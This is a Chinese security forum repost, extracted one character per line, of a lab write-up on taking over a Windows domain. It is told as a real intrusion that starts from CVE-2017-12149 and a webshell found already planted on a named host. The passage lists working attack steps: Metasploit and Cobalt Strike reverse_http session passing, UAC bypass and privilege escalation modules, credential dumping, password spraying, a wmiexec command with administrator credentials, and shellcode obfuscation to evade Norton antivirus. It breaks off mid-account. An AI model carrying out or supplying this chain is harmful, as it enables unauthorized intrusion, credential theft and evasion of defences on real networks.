论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[18979] 2021-08-20_如何打穿几千台机器的内网域渗透?当然是靠WMI横向移动了
文档创建者:
s7ckTeam
浏览次数:
4
最后更新:
2025-01-18
渗透测试
4 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2021-08-20_如何打穿几千台机器的内网域渗透?当然是靠WMI横向移动了
如
何
打
穿
几
千
台
机
器
的
内
网
域
渗
透
?
当
然
是
靠
W
M
I
横
向
移
动
了
原
创
I
n
B
u
g
实
验
室
I
n
B
u
g
实
验
室
2
0
2
1
-
0
8
-
2
0
收
录
于
话
题
#
w
e
b
s
h
e
l
l
,
1
#
渗
透
测
试
,
2
#
域
渗
透
,
1
前
言
前
言
首
先
是
发
现
了
一
个
C
V
E
-
2
0
1
7
-
1
2
1
4
9
:
访
问
h
t
t
p
:
/
/
i
n
b
u
g
.
o
r
g
:
9
0
9
0
/
s
t
a
t
u
s
发
现
有
日
志
,
已
经
被
上
传
了
w
e
b
s
h
e
l
l
:
那
么
就
用
别
人
的
把
:
h
t
t
p
:
/
/
i
n
b
u
g
.
o
r
g
:
9
0
9
0
/
j
e
x
w
s
4
/
j
e
x
w
s
4
.
j
s
p
?
p
p
p
=
w
h
o
a
m
i
通
过
p
o
w
e
r
s
h
e
l
l
上
线
到
C
s
:
发
现
有
几
百
个
补
丁
提
权
无
果
:
M
e
t
a
s
p
l
o
i
t
特
权
提
权
特
权
提
权
随
后
把
C
S
的
B
e
a
c
o
n
互
传
到
了
M
S
F
:
然
后
通
过
M
S
F
的
提
权
检
测
找
到
了
几
个
e
x
p
:
然
后
利
用
模
块
尝
试
提
权
:
发
现
用
户
身
份
没
变
,
但
是
当
前
特
权
变
了
:
M
S
F
:
u
s
e
e
x
p
l
o
i
t
/
m
u
l
t
i
/
h
a
n
d
l
e
r
s
e
t
p
a
y
l
o
a
d
w
i
n
d
o
w
s
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
h
t
t
p
C
S
:
创
建
监
听
器
w
i
n
d
o
w
s
/
f
o
r
e
i
g
n
/
r
e
v
e
r
s
e
_
h
t
t
p
执
行
监
听
器
s
p
a
w
n
m
s
f
r
u
n
p
o
s
t
/
m
u
l
t
i
/
r
e
c
o
n
/
l
o
c
a
l
_
e
x
p
l
o
i
t
_
s
u
g
g
e
s
t
e
r
e
x
p
l
o
i
t
/
w
i
n
d
o
w
s
/
l
o
c
a
l
/
b
y
p
a
s
s
u
a
c
_
s
d
c
l
t
直
接
g
e
t
s
y
s
t
e
m
提
权
到
S
Y
S
T
E
M
:
最
后
利
用
S
Y
S
Y
E
M
把
s
h
e
l
l
传
到
C
s
:
M
S
F
:
b
a
c
k
g
r
o
u
n
d
u
s
e
e
x
p
l
o
i
t
/
w
i
n
d
o
w
s
/
l
o
c
a
l
/
p
a
y
l
o
a
d
_
i
n
j
e
c
t
s
e
t
p
a
y
l
o
a
d
w
i
n
d
o
w
s
/
m
e
t
e
r
p
r
e
t
e
r
/
r
e
v
e
r
s
e
_
h
t
t
p
s
e
t
s
e
s
s
i
o
n
3
r
u
n
C
S
:
w
i
n
d
o
w
s
/
b
e
a
c
o
n
_
h
t
t
p
/
r
e
v
e
r
s
e
_
h
t
t
p
当
前
权
限
就
可
以
抓
密
码
了
:
既
然
当
前
b
e
a
c
o
n
不
是
S
Y
S
Y
E
M
,
而
且
有
了
本
地
管
理
员
的
账
号
h
a
s
h
和
明
文
,
直
接
本
地
p
s
e
x
e
c
利
用
本
地
a
d
m
i
n
i
s
t
r
a
t
o
r
的
密
码
上
线
:
内
网
横
向
移
动
内
网
横
向
移
动
这
个
时
候
发
现
就
是
一
个
S
Y
S
T
E
M
的
B
e
a
c
o
n
会
话
了
!
但
是
发
现
没
有
域
管
的
进
程
,
结
果
只
能
另
寻
他
路
!
然
后
用
抓
到
的
密
码
去
喷
射
域
内
其
他
主
机
:
然
后
可
以
横
向
w
m
i
:
p
r
o
x
y
c
h
a
i
n
s
p
y
t
h
o
n
3
w
m
i
e
x
e
c
.
p
y
-
s
h
e
l
l
-
t
y
p
e
c
m
d
a
d
m
i
n
i
s
t
r
a
t
o
r
:
p
a
s
s
w
o
r
d
@
1
0
.
2
2
6
.
0
.
1
0
8
-
c
o
d
e
c
g
b
k
B
y
p
a
s
s
诺
顿
诺
顿
A
V
上
线
到
上
线
到
C
o
b
a
l
t
S
t
r
i
k
e
之
后
发
现
1
0
.
2
2
6
.
0
.
1
5
6
有
一
个
域
管
的
进
程
:
t
a
s
k
l
i
s
t
/
v
然
后
还
有
诺
顿
A
V
:
使
用
I
n
S
c
a
n
的
S
h
l
l
C
o
d
e
免
杀
功
能
做
了
一
下
免
杀
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试